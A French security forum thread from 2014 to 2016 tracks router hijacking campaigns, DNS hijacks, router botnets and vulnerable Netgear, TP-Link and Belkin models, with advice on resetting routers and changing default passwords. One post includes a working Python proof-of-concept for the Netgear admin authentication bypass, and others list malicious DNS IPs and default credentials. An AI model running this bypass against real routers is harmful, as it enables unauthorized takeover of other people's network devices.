Piratages de routeurs en hausse

L'actualité & News Informatique!
Donc pas de demande d'aide dans cette partie.
Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Piratages de routeurs en hausse

Message par Malekal_morte » 11 mars 2014 12:37

Voici une page qui parle des piratages de routeurs de plus en plus visés.
Cette page sera éditée selon les évènements.

Dernier Edit - 08.10.2015 : Les routeurs Netgear touchés par une vulnérabilité.
On reconnait le problème de la sécurité des infrastructures réseaux souvent oubliées - on en parlait .

L'exploitation peut-être réalisée depuis :
  • une vulnérabilité sur les routeurs (il faut mettre à jour le firmware du routeur)
  • une vulnérabilité connue mais qui ne sera jamais corrigée dû à l'obsolescence
  • un mot de passe par défaut ou trop faible sur les interfaces de gestion du routeur
  • une backdoor / une porte dérobée qui a été cachée par le constructeur du routeur
  • une configuration trop permissive ou un code qui abaisse le niveau de sécurité
Une prise de contrôle du routeur est alors possible (il devient un routeur zombie) et/ou les configurations DNS (serveurs de noms) du routeur peuvent être modifiées, ce qui permettra d'effectuer des redirections.

Ce blog décrit un exemple d'attaque : http://rootatnasro.wordpress.com/2014/0 ... e-network/
routeurs_hacks.png
hacks routeurs

Hijack DNS

Le terme "hijack" signifie détourner donc "hijacking" est un détournement. Une estimation en 2014 tendait à démontrer qu'environ 200 000 routeurs algériens vulnérables aux détournements.

Ces procédés de modifications des serveurs DNS/de noms ne sont pas nouveaux et sont pratiqués depuis plusieurs années.
A ce propos, vous pouvez lire la page : Trojan.DNSChanger.

Deux sujets plus classiques avec redirections sur des machines algériennes.
Notez que les configurations DNS des ordinateurs avaient aussi été modifiées.
Des publicités sur des pages Facebook/Google s'affichaient à l'écran des utilisateurs.
http://www.commentcamarche.net/forum/af ... debarasser
http://www.commentcamarche.net/forum/af ... ut-of-date

Code : Tout sélectionner

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 41.77.138.18 8.8.8.8 
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{B784659B-49DA-4AE2-96A2-F74F97B326BC}: DhcpNameServer = 100.100.0.102 
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{FB792F37-0209-420A-B028-92EC1561AA02}: DhcpNameServer = 41.77.138.18 8.8.8.8
et :

Code : Tout sélectionner

nslookup http://www.google.fr /c >
Serveur : host-41.77.138.18.citynethost.com 
Address: 41.77.138.18 
DNS request timed out. 
timeout was 2 seconds. 
Le site ISMYDNSHIJACKED permet de tester ses DNS.
- dnscheck-ismydnshijacked-com-t51076.html

Image

Les détournements de l'interface de gestion ou bien les tentatives d'accès avec des mots de passe usuels ne sont pas nouveaux. Nous en parlions déjà fin 2008, du temps où Trojan.DNSChanger faisait rage...

Ces méthodes permettent donc de détourner du traffic pour par exemple effectuer toutes sortes d'attaques, comme par exemple faire des redirections vers de faux sites ou bien d'afficher des publicités, et plus insidieux, à des vols de cookies, d'identifiants, de formulaires, etc.

Le CERT Poleska a dernièrement émis une alerte sur des vols bancaires via ces détournements DNS. La nouvelle ayant été reprise par plusieurs médias comme le site de news TheHackerNews.
router-vulnerabilities-DNS-hijacking.png
DNS hijacking
Il y a peu d'informations concernant l'exploitation des vulnérabilités sur des box française, néanmoins, laissez le mot de passe par défaut n'est vraiment pas une bonne idée surtout lorsque l'on sait qu'une exploitation de ce genre est d'une simplification enfantine. Pensez donc à changer le mot de passe de votre box !


Conseils

Prendre connaissance de la FAQ : Les routeurs modems pour comprendre le fonctionnement d'un routeur.
  • Faire un "reset" (remise à zéro d'usine) du routeur. En général, se trouve un bouton sur lequel il faut appuyer pendant quelques secondes avec la mine d'un stylo par exemple.
    Image
    Image
    Image
  • Se connecter à l'interface WEB du routeur (ex : http://192.168.1.1/ ) et changez le mot de passe Administrateur.
  • Télécharger et installer le dernier firmware ( le micrologiciel du fabricant )
    En général, il faut se rendre sur le site du constructeur pour télécharger le dernier firmware.
    Ensuite se connecter à l'interface dans la partie "Mise à jour", un bouton "Parcourir" est disponible pour aller chercher le fichier du firmware téléchargé.
linksys-firmware-upgrade.jpg
Mise à jour routeur LinkSys
Liste des aides de certains constructeurs: EDIT: 25.05.2014 : TD-W8901G impactés

Pas mal de routeurs TD-W8901G attaqués.


EDIT: 17.09.2014 : découverte d'un réseau de 400 000 routeurs infectés ?

Kaspersky Labs a publié une analyse rapide d'une attaque qui vise les pays de langue portugais. Un courriel avec un lien cliquable, si l'utilisateur clique il est alors redirigé vers un site et si le mot de passe du routeur est celui par défaut, le routeur est attaqué, le cas échéant une fenêtre d'authentification vous demande de saisir vos identifiants. Une évolution comparé à Carna botnet découvert en 2013 qui ciblait seulement les routeurs accessibles par identifiants "root/root" et "admin/admin".

Toujours en septembre 2014, le blog malwaremustdie revient sur une analyse de Linux/Elknot qui infecte les routeurs pour mener des attaques DoS.

Une autre analyse rapporte les vulnérabilités sur la plupart des routeurs grands publics.
SOHO_router_vuln.png
Vulnérabilité sur routeurs SOHO

EDIT: 12.01.2015 : Le groupe "Lizard Squad" utilise un botnet de routeurs

Lire le bulletin d'information Lizard Squad dispose d'un botnet de routeurs


EDIT: 28.05.2015 : Le ver informatique Linux/Moose

Cette fois-ci, un ver s'attaque aux routeurs, il se propage par attaques en force bruie de l'authentification.

Lire le bulletin d'information Le ver informatique Linux/Moose aime vos routeurs.

EDIT: 08.10.2015 : Les routeurs Netgear touchés par une vulnérabilité

Sur la news de BleepingComputer, on apprend que certains routeurs Netgear possèdent une vulnérable à distance qui concerne l'authentification de l'administration à distance.

Les modèles Netgear sont :
* JNR1010v2
* JNR3000
* JWNR2000v5
* JWNR2010v5
* N300
* R3250
* WNR2020
* WNR614
* WNR618

Et les firmwares vulnérables sont :
* N300_1.1.0.31_1.0.1.img
* N300-1.1.0.28_1.0.1.img


10 000 routeurs aurait été touchés.
La vulnérabilité a été remontée à NetGear en Juillet et... toujours aucun correctif
Vous devez donc absolument désactiver l'authentification à distance à attendant un correctif.

Source : http://www.csnc.ch/misc/files/advisorie ... Bypass.txt
Netger_administration_distance.jpg
Netgear Administration à distance
EDIT: 15025.02.2016 : RouterHunter pour trouver des routeurs non à jour

Pour les administrateurs, RouterHunter permet de scanner le réseau à la recherche de routeur ayant des vulnérabilités.
Routerhunter.png
RouterHunter
EDIT: 01.2017 : D-Link attaqué aux USA par la FTC

D-Link attaqué aux USA pour des raisons de sécurité.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 02 avr. 2014 17:37

Sality utilise Win32/RBrute pour accéder aux routeurs et changer les DNS.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 25 mai 2014 14:40

Routeurs TP Link : TD-W8901G impactés, affichage de fausses pubs Java/Flash.

Quelques DNS :
* 23.253.94.129
* 40.20.1.201
* 40.20.1.202
* 178.33.118.171

Appuyer avec une épingle/stylo sur le bouton "reset" pendant quelques secondes.
Veiller à ne pas appuyer trop fort avec l'épingle au risque de perforer la membrane.
TD-W8901G-reset1.jpg
TD-W8901G hard reset
Reconfigurer ensuite les paramètres de sa connexion internet.
Veiller à changer les mots de passe par défaut du routeur.
Faire une mise à jour du dernier firmware TP Link
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 20 sept. 2014 16:36

Nouvelle campagne de détournements DNS sur IPs : 76.73.6.26 & 50.7.75.2
Les symptômes constatés sont des redirections vers le site indieposts.com
https://www.supprimer-virus.com/supprim ... posts-com/
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 14 oct. 2014 09:19

Autre cas de routeur piraté avec symptômes de modifications des DNS
http://www.commentcamarche.net/forum/af ... pas-privee

L'internaute reçoit le message suivant à la visite de Google :
Votre connexion n'est pas privée

"Il se peut que des pirates soient en train d'essayer de dérober vos informations sur le site mail1.eccc.gov.kh (par exemple, des mots de passe, des messages ou des informations sur vos cartes de paiement)."
Cela vient du fait que lorsque l'ordinateur du réseau demande la résolution DNS pour l'adresse Google, une mauvaise adresse de serveur DNS est retournée.

Liste des réponses pour Google.fr
dhcp1.office1.digi.com.kh
173.194.127.111
173.194.127.119
173.194.127.120
173.194.127.127
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 26 févr. 2015 15:01

Nouvelle campagne de détournement de routeurs TP-LINK, les IPs sont:
209.244.0.3
195.238.181.164


Les symptômes constatés sont l'ouverture de popups pornographiques en langue russe.

Les adresses sont:
adultcameras.info
adultyum.info


http://www.supprimer-virus.com/adultcam ... ltyum-info
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

chef
Geek à longue barbe
Geek à longue barbe
Messages : 5319
Inscription : 25 janv. 2008 18:06
Localisation : ici et la !!!!

Re: Hacks routeurs en hausse

Message par chef » 26 févr. 2015 15:47

Bonjour,

Je me pose la question, nos routeurs fournis par nos FAI ( Orange, Free,..,) à part changer le mot de passe ?

Merci
marque pc:EasyNote TV44HC
produit: Intel(R) Core(TM) i3-3110M CPU @ 2.40GHz
mémoire: 4GiB
carte graphique : nvidia geforce 710
Description: Debian GNU/Linux 8.0 (jessie)

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 28 févr. 2015 20:50

En France, sur les routeurs / box des FAI, il n'y a pas à gérer les mises à jour.
Pour Livebox & Freebox, par exemple, c'est silencieux et automatique.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
devadip
Geek à longue barbe
Geek à longue barbe
Messages : 655
Inscription : 25 févr. 2008 21:01

Re: Hacks routeurs en hausse

Message par devadip » 01 mars 2015 13:14

Bonjour,

J'ai cru comprendre que pour la Freebox V5, qu'il faut la débrancher (min 1 fois par mois) attendre quelques secondes et la rebrancher. Et faire de même avec la box internet et box TV.

chef
Geek à longue barbe
Geek à longue barbe
Messages : 5319
Inscription : 25 janv. 2008 18:06
Localisation : ici et la !!!!

Re: Hacks routeurs en hausse

Message par chef » 01 mars 2015 13:18

Bonjour,

Pour la box internet, oui mais pour la TV, pourquoi ?
La box TV est déjà reliée à la box internet, non ?
marque pc:EasyNote TV44HC
produit: Intel(R) Core(TM) i3-3110M CPU @ 2.40GHz
mémoire: 4GiB
carte graphique : nvidia geforce 710
Description: Debian GNU/Linux 8.0 (jessie)

Avatar de l’utilisateur
devadip
Geek à longue barbe
Geek à longue barbe
Messages : 655
Inscription : 25 févr. 2008 21:01

Re: Hacks routeurs en hausse

Message par devadip » 01 mars 2015 15:15

Bonjour,

C'est exact, bonne question et je te remercie de me l'avoir posée.
Je suppose que c'est pour mettre la mise à jour "en marche"..

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 07 mai 2015 19:38

Édité pour ajouter un paragraphe.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 03 sept. 2015 12:04

Les routeurs Belkin N600 DB Dual Band N+ modèle F9K1102 v2 avec firmware v2.10.17 et antérieurs présentent diverses vulnérabilités jugées sévères : CERT - Vulnerability Note VU#201168.
Pour le moment, il n'y a pas de correctifs disponibles.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 08 oct. 2015 23:28

Bulletin initial édité pour informer d'une vulnérabilité touchant les routeurs Netgear.

Code : Tout sélectionner

import os
import urllib2
import time
import sys

try:
	first = urllib2.urlopen("http://" + sys.argv[1])
	print "No password protection!"
except:
	print "Password protection detected!"
	print "Executing exploit..."
	for i in range(0,3):
		time.sleep(1)
		urllib2.urlopen("http://" + sys.argv[1] + "/BRS_netgear_success.html")

	second = urllib2.urlopen("http://" + sys.argv[1])
	if second.getcode() == 200:
		print "Bypass successfull. Now use your browser to have a look at the admin interface."
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Avatar de l’utilisateur
Malekal_morte
Site Admin
Site Admin
Messages : 85505
Inscription : 10 sept. 2005 13:57
Contact :

Re: Hacks routeurs en hausse

Message par Malekal_morte » 25 févr. 2016 18:23

Asus a été condamné par la commission de protection des consommateurs américains a une amende de 206 millions de dollars pour défaut de protections pour ses routeurs (environ 13 000). Il était possible de récupérer ou changer les paramètres des routeurs par une simple connexion USB. D'autres grands équipementiers n'ont pas été inquiétés pour les mêmes faits. On the road again..

https://www.ftc.gov/news-events/press-r ... rvices-put
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

Répondre

Revenir vers « Actualité & News Informatique »

Qui est en ligne ?

Utilisateurs parcourant ce forum : Aucun utilisateur inscrit et 1 invité